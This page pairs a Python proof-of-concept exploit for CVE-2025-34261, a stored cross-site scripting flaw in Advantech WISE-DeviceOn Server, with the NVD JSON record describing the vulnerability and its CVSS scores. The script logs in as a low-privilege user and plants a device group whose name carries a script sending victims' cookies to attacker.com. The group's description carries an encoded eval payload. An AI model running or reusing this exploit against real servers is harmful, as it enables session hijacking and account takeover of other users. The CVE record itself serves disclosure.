CVE-2025-34261

import requests import json # CVE-2025-34261 PoC - Advantech WISE-DeviceOn Server Stored XSS # Target: /rmm/v1/devicegroups/ endpoint TARGET_URL = "https://target-server.com" LOGIN_URL = f"{TARGET_URL}/rmm/v1/auth/login" DEVICE_GROUPS_URL = f"{TARGET_URL}/rmm/v1/devicegroups/" # XSS Payload - Cookie Stealer XSS_PAYLOAD_NAME = "<script>fetch('https://attacker.com/log?c='+document.cookie)</script>" XSS_PAYLOAD_DESC = "<img src=x onerror='eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))')>" def exploit(): """ Exploitation steps: 1. Authenticate with low-privilege credentials 2. Create device group with XSS payload in name/description 3. Payload stored and executed when other users view device groups """ session = requests.Session() # Step 1: Login with low-privilege user login_data = { "username": "attacker_user", "password": "attacker_password" } login_response = session.post(LOGIN_URL, json=login_data) if login_response.status_code != 200: print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Create device group with XSS payload device_group_data = { "name": XSS_PAYLOAD_NAME, "description": XSS_PAYLOAD_DESC, "devices": [] } create_response = session.post(DEVICE_GROUPS_URL, json=device_group_data) if create_response.status_code in [200, 201]: print("[+] Malicious device group created successfully") print(f"[+] Payload will execute when other users view device groups") return True else: print(f"[-] Failed to create device group: {create_response.status_code}") return False if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-34261", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:55.827", "lastModified": "2025-12-17T17:15:49.433", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/devicegroups/ endpoint. When an authenticated user creates a device group, the name and description values are stored and later rendered in device group listings without proper HTML sanitation. An attacker can inject malicious script into either field, which is then executed in the browser context of users who view or interact with the affected device group, potentially enabling session compromise and unauthorized actions as the victim."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:advantech:wise-deviceon_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4", "matchCriteriaId": "BFB1F2C4-C260-473E-A6E1-EE7DFC3EF083"}]}]}], "references": [{"url": "https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn-20251208-2.pdf", "source": "[email protected]"}, {"url": "https://docs.deviceon.advantech.com/docs/resource/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-devicegroups", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}